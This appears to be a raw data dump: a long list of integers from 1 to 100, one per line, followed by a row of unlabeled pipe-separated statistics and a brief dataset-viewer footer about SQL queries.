87
21
75
79
92
27
87
85
9
15
86
83
87
66
48
58
3
82
3
39
76
73
92
2
9
14
44
92
74
34
52
83
11
88
87
42
7
33
82
74
60
94
29
10
77
69
84
33
84
98
94
62
24
49
93
22
80
2
80
87
69
95
23
88
79
57
27
37
17
65
88
29
78
63
52
71
9
76
50
91
23
5
45
83
87
11
28
67
1
39
19
26
11
85
95
65
16
73
22
38
64
92
90
18
92
75
61
42
28
9
73
38
25
51
11
92
3
56
87
81
89
13
21
19
76
80
18
54
8
3
8
72
60
43
14
87
36
96
58
97
62
26
69
75
80
65
92
18
74
3
24
79
66
57
62
54
17
94
20
37
20
62
18
7
4
80
11
83
80
55
65
8
99
77
67
46
38
18
66
86
32
46
23
43
54
53
70
48
3
71
64
69
69
24
85
9
86
84
18
81
62
71
36
93
73
100
78
8
80
22
26
68
61
84
66
48
94
2
66
63
60
65
18
99
59
10
58
36
52
97
86
19
71
93
3
85
81
32
98
24
21
29
64
12
15
98
64
40
52
79
72
59
21
28
92
85
53
64
52
62
12
33
65
13
45
2
37
88
52
13
85
20
40
14
30
100
28
62
62
71
16
11
75
53
62
88
79
71
31
99
85
32
51
3
96
32
18
80
24
84
10
66
23
68
86
32
26
50
70
66
90
13
5
63
77
62
25
79
21
3
37
98
76
52
37
73
37
31
58
15
14
37
21
22
32
82
60
21
14
84
96
41
96
11
1
34
89
50
71
8
1
35
68
6
41
4
99
88
33
34
81
35
57
98
81
4
100
50
52
71
87
17
60
11
36
59
27
13
39
28
1
30
88
28
65
74
68
34
21
63
7
60
19
70
7
80
16
82
61
28
4
53
9
28
1
12
62
38
28
93
86
23
100
50
89
47
53
39
99
28
16
6
90
17
68
43
96
38
42
61
71
73
47
37
33
85
38
75
91
58
9
41
11
95
84
69
61
75
88
10
56
18
86
10
44
79
53
33
53
29
39
77
6
46
65
73
25
53
26
56
21
27
22
71
98
34
83
41
91
7
86
22
26
50
50
25
4
58
90
17
28
92
26
65
71
82
90
91
16
48
89
37
94
34
1
35
65
47
78
9
8
87
5
47
64
46
65
3
5
16
65
2
61
49
100
36
23
39
44
22
64
42
29
84
45
49
37
19
35
8
98
37
84
17
41
1
74
98
97
85
53
83
3
41
68
11
37
74
95
16
22
39
99
61
92
32
95
82
44
31
16
33
25
90
100
19
85
72
89
28
69
76
77
24
47
9
32
89
31
50
6
63
4
31
32
62
42
78
55
61
82
88
99
88
26
74
83
35
12
92
13
95
40
66
2
65
55
35
98
86
86
47
48
88
7
66
70
39
30
70
80
48
1
33
10
83
59
10
83
27
14
48
44
8
12
2
49
59
75
10
37
71
38
9
51
19
28
92
40
63
58
52
85
66
60
3
95
46
81
47
14
15
30
94
50
79
7
7
2
93
40
74
20
58
14
61
31
95
8
4
31
10
79
33
2
61
73
50
22
64
51
35
37
89
38
8
56
14
75
87
28
50
35
20
77
63
2
27
52
9
86
72
92
41
63
89
92
87
64
21
53
77
67
78
48
49
94
82
16
10
46
21
10
53
23
23
78
53
58
81
23
77
11
29
22
68
36
16
28
11
14
89
39
52
73
41
67
21
29
65
71
56
77
27
53
67
64
91
99
48
33
38
80
97
13
49
96
24
65
26
31
42
61
45
76
47
62
77
34
26
29
70
70
84
24
6
44
69
82
73
2
46
93
15
58
40
53
88
54
4
1
5
98
90
14
99
60
76
82
69
18
83
21
8
20
15
67
41
69
37
77
71
96
68
92
97
68
41
89
3
21
36
33
6
66
96
71
78
21
89
16
8
73
29
18
43
4
4
52
53
43
92
14
69
66
27
44
67
71
77
15
52
84
74
48
4
18
54
29
58
32
37
18
67
69
84
6
74
50
29
69
68
62
58
8
65
18
3
64
57
62
42
79
62
47
99
45
100
20
90
89
3
21
72
53
55
54
37
81
10
61
38
27
26
61
47
41
29
85
16
53
19
68
100
18
38
61
92
12
89
1
76
53
15
19
20
48
69
46
60
67
94
56
47
30
76
81
53
8
4
3
35
93
8
37
83
57
74
75
85
63
41
10
8
37
96
66
91
24
7
43
18
28
27
25
60
60
55
18
42
40
44
49
96
14
61
39
96
78
14
37
8
82
83
13
29
73
80
93
38
95
21
78
75
16
9
14
18
83
99
82
88
26
40
76
67
52
87
57
40
28
39
53
87
90
70
17
79
77
39
88
96
50
43
68
47
48
7
85
73
4
81
48
43
37
53
15
27
69
9
82
72
53
82
98
61
32
94
37
3
25
39
49
31
40
86
39
98
10
8
12
54
87
47
59
96
48
94
19
75
77
58
50
89
52
98
74
66
31
39
97
82
77
81
89
66
16
93
59
69
48
68
38
21
75
62
39
82
72
93
13
65
93
18
30
45
7
94
67
34
92
10
92
73
36
83
9
25
62
16
74
10
95
76
62
81
23
33
86
14
70
3
83
62
97
31
95
10
44
47
58
15
25
17
8
30
25
12
58
30
7
70
80
56
98
23
20
2
55
21
93
84
60
20
8
22
30
11
41
43
55
6
2
50
64
1
69
10
65
2
39
40
65
12
88
31
87
39
97
71
5
62
100
65
57
87
15
77
56
3
70
71
48
6
76
76
50
23
69
44
67
67
55
31
92
76
5
13
39
61
86
74
31
59
100
73
39
96
13
80
92
79
74
10
29
57
97
17
69
28
85
78
6
35
4
9
92
94
45
49
60
70
19
2
27
76
66
57
89
80
8
95
65
76
6
62
9
14
10
86
52
44
76
79
79
74
44
23
20
82
69
96
5
72
64
3
98
61
60
98
69
5
14
21
75
1
62
44
37
23
45
26
48
71
84
96
23
13
22
39
51
71
57
63
61
97
84
85
90
29
82
42
9
81
76
57
96
28
17
34
87
33
87
54
5
15
40
18
87
89
51
15
55
33
32
34
80
65
63
77
62
61
39
62
26
22
66
93
58
85
97
31
83
64
83
94
84
79
47
2
35
15
78
16
59
90
13
44
8
7
10
60
43
17
6
35
58
21
88
100
15
23
25
36
41
38
95
92
2
67
31
21
98
38
48
35
38
37
89
42
26
100
55
13
21
25
84
62
21
79
64
80
58
90
57
81
75
42
16
90
11
83
75
81
39
1
51
17
72
88
34
32
42
51
12
95
58
91
52
89
37
21
94
15
43
46
39
47
7
95
12
50
84
64
51
43
75
77
17
79
7
52
72
41
46
20
90
24
38
95
98
49
5
78
86
85
11
45
85
35
73
66
73
44
13
86
71
11
86
46
98
34
30
36
62
84
8
54
60
19
7
6
42
88
79
20
84
97
52
7
71
54
15
8
42
23
54
50
25
59
12
1
86
75
60
31
38
58
75
53
94
1
84
15
19
75
95
8
4
71
22
1
36
40
77
74
96
1
47
48
43
50
84
54
47
63
47
60
75
70
6
33
20
30
91
46
96
14
39
56
10
77
50
69
18
64
60
21
59
43
43
55
92
56
3
54
15
11
21
50
10
44
13
47
24
98
66
57
25
54
9
35
1
31
24
43
62
46
14
66
45
38
57
90
88
93
84
22
21
20
43
44
44
45
16
20
67
69
81
32
28
60
34
49
90
43
94
75
31
15
16
40
70
54
94
21
44
73
2
73
4
35
11
16
38
99
17
94
12
1
73
72
69
75
82
46
32
17
44
81
4
66
48
89
56
56
58
56
25
68
69
41
94
90
17
17
40
46
37
33
59
10
47
72
100
37
39
3
40
70
32
14
41
46
1
11
65
6
10
80
24
8
40
89
82
91
43
55
46
87
12
73
25
30
87
15
21
74
29
39
26
50
24
90
60
44
47
58
100
63
41
4
48
58
26
53
73
76
95
20
19
60
13
50
34
99
92
1
62
21
97
3
52
73
76
31
2
31
5
47
33
54
91
52
73
22
44
50
33
53
20
18
65
94
98
29
71
71
74
9
10
59
77
13
35
6
64
17
30
55
72
31
47
47
89
63
55
57
61
61
21
6
80
88
38
60
75
79
21
50
70
2
69
44
97
95
16
32
85
87
82
48
15
96
6
53
88
38
7
82
76
12
29
30
17
86
57
3
81
97
78
7
3
60
56
30
14
15
75
12
22
27
6
66
39
75
58
39
45
46
5
15
35
35
73
28
34
41
26
31
78
12
76
30
32
97
91
18
91
4
20
35
50
57
60
89
61
21
50
60
2
28
100
45
24
25
100
54
26
16
1
97
49
17
1
36
98
95
37
89
18
47
3
93
92
81
100
73
32
71
49
47
53
32
52
72
6
3
5
63
86
91
87
8
22
77
35
16
59
98
66
50
12
53
36
75
20
11
50
75
98
99
5
46
34
62
27
75
100
42
15
50
50
22
40
90
35
16
54
45
9
67
26
63
34
64
95
82
93
81
54
77
34
21
96
65
1
96
49
40
23
73
16
63
63
29
44
81
65
7
15
22
93
73
99
9
25
52
18
29
13
91
73
44
28
84
63
79
72
1
60
81
27
64
13
26
33
4
29
75
65
72
4
76
64
5
60
23
32
34
3
13
30
77
7
28
97
61
96
65
54
12
82
98
69
79
89
57
11
32
24
29
76
40
36
96
68
8
87
68
93
31
84
66
5
58
65
77
30
30
56
8
61
47
90
54
11
67
68
55
87
71
44
12
10
16
15
71
67
100
33
18
37
6
63
28
38
52
39
76
86
100
80
72
82
19
45
22
46
5
76
88
77
93
59
12
77
2
10
36
28
74
41
35
78
85
94
99
12
76
13
61
21
70
99
30
87
17
66
12
34
58
7
16
37
26
87
72
69
89
46
27
98
80
94
59
47
91
88
57
43
43
72
63
42
10
67
14
12
90
33
71
76
98
15
71
40
8
81
73
12
49
26
34
85
40
74
81
31
89
24
92
35
79
45
55
4
20
63
38
72
10
2
99
4
57
88
27
39
34
99
73
1
30
83
82
99
97
75
67
56
64
3
20
34
63
20
61
4
86
16
33
66
4
92
22
22
28
80
16
67
57
85
98
72
19
6
1
75
11
94
26
56
25
42
63
14
97
60
6
55
94
10
45
10
73
54
87
76
9
7
16
46
83
78
96
98
80
87
45
51
45
65
1
64
21
23
1
67
85
93
35
41
13
60
76
49
10
16
8
1
88
35
63
64
4
96
69
5
55
94
91
97
71
33
39
3
20
35
91
97
10
15
78
77
19
63
4
20
60
49
86
65
66
6
73
30
14
17
70
39
89
33
88
19
16
89
48
31
68
61
81
16
72
52
10
79
20
98
56
15
53
22
79
27
66
8
56
96
61
30
82
55
88
3
25
56
73
15
91
76
20
64
94
76
19
81
31
78
7
98
16
53
41
80
3
98
12
15
17
30
40
84
93
1
37
3
44
50
2
94
56
66
11
46
98
20
74
9
33
60
40
2
61
16
4
84
34
34
56
70
26
56
67
54
8
21
62
63
83
36
71
60
99
25
59
13
27
27
37
27
55
36
19
77
32
77
45
1
98
41
49
2
54
54
20
74
12
3
95
3
43
75
23
27
5
21
38
65
57
55
92
98
28
91
93
77
58
92
79
84
92
74
22
10
51
15
73
10
15
79
57
44
12
16
54
47
84
24
34
74
29
3
76
84
5
3
18
91
49
38
70
63
89
59
77
55
48
96
37
9
78
29
50
77
77
98
20
64
74
63
36
9
3
39
44
94
79
57
24
22
20
12
82
95
68
67
35
67
84
59
87
12
92
88
43
89
57
2
88
76
46
35
98
60
38
69
10
68
62
59
34
14
6
59
16
89
12
26
31
8
47
18
70
53
66
40
87
39
9
87
90
24
58
29
45
58
9
71
19
27
73
11
66
42
53
62
80
60
59
29
15
2
49
62
38
73
56
51
38
1
34
17
72
90
55
25
33
99
40
73
64
12
12
21
78
20
83
12
97
86
69
89
50
17
44
12
60
69
45
5
69
14
48
84
2
79
60
97
19
65
41
81
23
100
41
32
95
26
70
74
85
28
38
45
80
73
1
37
84
10
35
92
96
74
74
53
47
75
3
63
6
70
3
65
45
60
58
61
81
63
17
96
6
54
40
24
82
10
100
87
3
45
56
19
94
44
19
36
70
40
44
60
6
65
66
55
38
96
84
32
38
99
76
25
1
16
13
1
39
19
48
35
14
84
88
66
52
92
5
69
22
47
85
78
14
37
28
57
68
63
80
47
79
44
91
89
29
11
29
69
91
98
56
38
29
77
88
94
91
56
50
93
13
26
89
71
90
89
43
93
29
7
42
96
6
86
85
45
55
3
2
39
46
82
93
5
99
78
35
99
28
87
72
92
62
12
69
80
18
93
93
90
79
74
68
41
44
30
59
3
85
16
69
69
39
21
60
81
91
3
88
15
68
30
49
85
70
67
16
14
19
4
32
52
33
30
9
17
53
52
63
35
74
78
50
72
38
66
42
12
84
76
54
48
91
56
37
36
95
19
77
70
74
77
44
11
26
52
77
91
83
95
96
33
66
59
79
29
97
85
18
89
20
44
25
53
74
23
6
14
54
89
90
67
26
52
54
91
58
100
42
73
18
99
100
71
74
13
3
64
4
19
99
22
95
37
96
91
88
84
79
45
52
50
99
86
15
19
78
69
93
44
58
94
97
91
83
91
25
52
19
35
56
49
10
74
25
17
84
75
26
59
14
80
89
90
13
27
97
31
81
67
30
31
57
55
38
21
19
95
4
84
56
75
47
51
28
29
18
60
90
93
56
76
35
62
28
62
1
59
30
21
24
57
94
32
28
90
18
23
74
17
26
41
74
66
74
4
86
74
1
51
85
2
40
83
4
86
68
61
87
64
98
63
14
73
63
54
100
54
48
86
24
82
14
13
61
9
100
40
23
41
24
73
11
80
38
30
8
42
27
71
22
67
49
26
60
82
74
8
41
41
72
76
69
94
18
23
67
24
30
45
94
5
95
71
93
93
68
40
42
44
71
43
76
4
52
94
77
72
61
53
3
53
34
78
59
94
80
25
18
93
37
9
40
46
80
80
91
75
56
33
89
15
14
91
47
26
68
90
45
67
22
44
31
4
18
26
58
41
48
47
80
24
19
56
24
3
49
32
9
51
85
34
64
49
31
82
20
42
64
53
48
87
88
88
90
28
29
66
11
37
35
46
38
55
14
70
25
67
41
54
32
41
95
78
84
65
58
22
47
81
72
7
92
68
89
17
11
76
85
3
86
40
51
60
10
27
82
64
76
50
28
48
60
38
33
29
39
39
69
100
53
76
20
81
30
67
21
73
58
48
51
7
57
81
88
35
21
89
17
84
49
71
5
52
44
70
22
7
14
74
60
2
44
86
66
1
30
4
62
58
79
25
81
82
41
83
57
45
78
74
99
14
92
42
20
73
92
83
3
65
86
51
81
25
66
4
77
6
49
30
59
3
93
70
74
74
46
26
68
100
50
22
5
93
76
38
43
60
15
16
81
44
79
37
84
16
57
97
2
52
41
46
35
94
28
84
85
8
41
23
1
43
89
11
23
66
31
40
100
33
35
45
71
16
60
100
91
98
4
59
30
23
14
13
74
35
21
86
78
3
48
72
27
50
10
53
83
57
52
17
97
72
87
98
30
66
28
90
74
13
12
34
30
43
6
20
36
91
59
65
19
31
34
5
45
63
44
18
2
75
26
27
72
63
23
31
61
41
96
90
91
61
25
1
68
98
34
87
57
88
72
87
33
46
7
76
86
65
69
49
83
85
65
40
78
81
50
66
51
48
32
6
39
92
49
4
85
52
52
46
71
78
6
84
91
2
91
94
55
55
35
50
22
63
91
84
16
19
45
54
47
7
60
40
23
32
26
100
63
19
18
20
55
51
16
42
52
2
75
18
64
90
42
98
17
15
92
13
82
48
54
97
39
90
36
22
22
94
22
41
47
99
15
20
25
65
98
76
13
82
67
83
61
72
58
80
33
76
89
53
58
23
3
71
14
39
91
70
73
30
31
97
82
69
50
9
55
79
53
93
15
5
89
43
48
12
55
64
47
83
2
20
61
95
48
9
49
65
2
51
1
93
57
88
96
74
99
71
80
99
9
49
66
28
61
54
18
65
73
58
8
42
81
82
53
38
37
77
40
40
65
12
18
24
65
59
16
46
2
79
81
76
45
53
17
89
21
65
34
23
79
57
88
100
4
97
70
10
91
78
66
82
68
37
88
26
52
15
80
89
88
36
18
89
63
87
1
2
23
72
9
95
84
71
28
18
40
80
17
91
33
40
76
66
35
2
36
28
40
85
30
61
78
84
83
50
35
67
28
97
60
69
36
82
97
25
91
52
52
93
39
67
57
60
19
76
86
55
16
24
100
52
89
72
68
55
12
72
88
70
90
14
69
78
38
18
99
43
93
99
15
4
34
95
50
18
76
12
21
99
62
63
5
49
75
53
1
89
4
43
52
65
60
13
11
55
81
77
85
44
49
79
57
84
55
73
29
53
80
66
88
11
48
15
59
87
98
5
50
70
91
100
76
75
49
53
68
98
31
70
38
66
63
56
81
54
96
18
77
45
81
76
58
46
3
10
96
33
50
19
86
65
37
45
81
35
12
26
82
12
78
69
4
90
17
4
19
78
40
37
42
10
38
3
55
1
69
32
37
11
83
82
89
32
70
12
6
26
87
81
100
51
28
79
55
32
90
61
45
74
27
73
2
9
89
55
54
72
88
67
66
23
77
59
8
51
84
3
93
36
78
5
14
52
90
43
55
9
57
53
59
36
4
44
100
31
47
14
22
31
18
31
15
93
95
12
38
60
68
2
76
12
31
5
63
100
51
87
14
2
100
20
91
16
84
94
99
77
99
56
98
57
57
15
56
25
49
98
17
13
58
36
65
64
96
67
71
13
5
31
74
37
56
34
34
29
74
5
14
56
66
48
75
80
29
5
64
56
66
34
83
69
59
95
55
100
13
35
61
27
34
88
23
14
18
55
30
47
87
76
95
68
68
32
48
44
18
21
61
67
4
33
95
13
18
24
30
87
36
43
55
83
82
58
12
44
75
84
60
28
16
64
31
28
32
90
2
14
61
38
80
17
32
50
67
32
86
19
68
54
74
70
9
13
11
73
12
95
8
73
39
100
92
60
59
96
67
84
51
4
9
61
85
44
86
5
53
48
55
66
49
13
21
61
40
84
15
75
11
57
79
32
96
82
21
6
32
67
46
32
69
34
55
70
73
80
40
6
85
38
79
72
15
22
10
11
6
64
38
44
52
70
89
10
96
92
88
64
26
43
17
46
96
92
98
40
40
17
1
11
15
2
91
41
19
53
50
76
62
1
17
60
92
50
68
52
68
53
63
31
69
70
65
12
36
44
8
96
5
43
69
3
70
12
61
43
21
49
94
36
48
89
3
32
52
7
8
97
63
9
82
18
53
19
41
30
91
40
17
27
59
13
15
31
97
39
93
47
86
55
81
99
19
53
38
85
36
55
4
48
50
96
32
20
66
47
96
4
82
5
49
49
7
75
79
82
79
92
28
53
81
48
21
79
98
68
62
18
26
21
54
19
23
94
68
8
53
36
82
55
97
11
72
21
54
48
5
45
89
82
48
47
86
39
93
32
87
47
82
87
61
54
68
98
78
39
35
79
25
6
58
47
24
70
94
59
56
68
98
6
1
54
16
41
58
26
22
76
47
76
65
35
22
13
29
40
66
10
37
91
91
39
76
47
60
10
65
100
70
16
60
23
15
66
10
100
22
51
47
42
2
96
3
57
51
32
5
22
6
79
28
31
80
79
73
96
85
58
31
23
10
91
4
45
35
97
63
89
5
59
1
73
45
86
38
93
66
94
4
5
57
98
79
61
18
37
5
68
20
55
92
86
26
45
76
61
35
57
66
84
89
27
46
9
88
1
64
63
49
95
36
17
98
54
64
60
86
37
55
2
66
6
80
6
52
46
46
99
71
99
17
59
97
2
18
1
94
53
29
13
84
14
51
29
8
27
1
47
27
47
100
21
41
35
68
47
13
24
49
83
65
74
89
28
3
36
66
54
39
48
44
14
57
50
1
34
49
84
59
71
31
26
83
62
91
20
30
67
74
97
38
49
40
25
59
22
91
19
51
51
3
19
56
6
84
64
86
63
95
26
35
9
18
49
35
47
88
63
80
16
44
38
63
17
52
65
47
37
34
22
66
88
93
98
2
82
76
100
93
22
90
23
27
25
51
36
1
73
68
70
3
39
70
69
26
41
49
29
70
98
12
88
83
32
43
8
31
100
90
32
87
81
45
52
89
82
59
50
18
56
71
100
48
25
38
50
46
49
68
9
3
46
94
97
12
65
19
91
80
81
31
34
73
15
80
20
10
69
95
71
66
58
15
16
55
26
30
68
38
11
63
62
61
84
83
4
5
31
76
7
81
48
96
86
56
22
57
72
13
74
75
82
95
22
70
47
64
4
51
8
46
93
43
100
32
44
34
19
44
78
97
58
18
40
34
61
51
53
89
53
79
19
87
26
5
45
82
95
69
76
80
57
96
42
66
27
35
81
91
41
73
14
82
1
44
90
69
76
39
50
87
29
6
38
82
89
82
67
60
20
61
91
77
89
48
92
66
5
33
56
58
58
54
25
73
94
47
51
37
30
89
9
43
64
2
30
51
71
18
7
39
100
58
89
65
33
28
52
54
72
50
50
17
80
21
79
92
24
12
60
13
13
46
81
27
79
93
27
27
17
66
54
85
16
62
84
30
17
33
3
93
65
29
12
31
62
14
100
69
9
57
41
15
71
98
15
60
66
24
50
80
98
24
80
92
92
11
35
14
10
79
5
1
87
74
3
73
52
79
28
73
32
35
96
69
98
33
38
66
52
95
64
81
24
1
5
11
45
53
55
6
81
17
16
56
35
58
80
58
54
18
50
14
23
57
74
90
86
65
43
29
25
74
92
93
51
66
47
28
50
83
23
50
43
2
67
10
72
92
70
56
55
90
52
34
98
53
70
73
71
73
3
98
97
60
58
91
98
77
30
68
37
36
87
76
67
72
35
72
14
36
26
26
7
2
76
48
84
2
46
83
89
2
12
5
5
43
29
30
57
93
80
75
6
75
14
5
59
20
60
38
65
47
10
18
13
49
23
42
9
42
26
100
84
53
10
64
71
13
41
77
39
58
81
85
29
7
26
35
51
97
76
67
55
34
8
97
32
67
23
76
71
90
3
50
64
21
73
43
82
11
91
61
89
100
94
8
72
48
39
44
41
66
75
63
73
83
81
100
28
16
10
38
18
43
61
47
66
64
87
1
69
83
33
96
25
52
58
65
68
57
16
34
35
55
87
23
28
33
4
19
8
56
94
19
60
47
41
93
| 2.920708
| 3
| 0.657651
| 10,000
| 29,210
| 1.921
| 0.01
| 0.001093
| 0.001093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.342349
| 29,210
| 10,000
| 4
| 2.921
| 0
| 0
| 0
| 0.9122
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.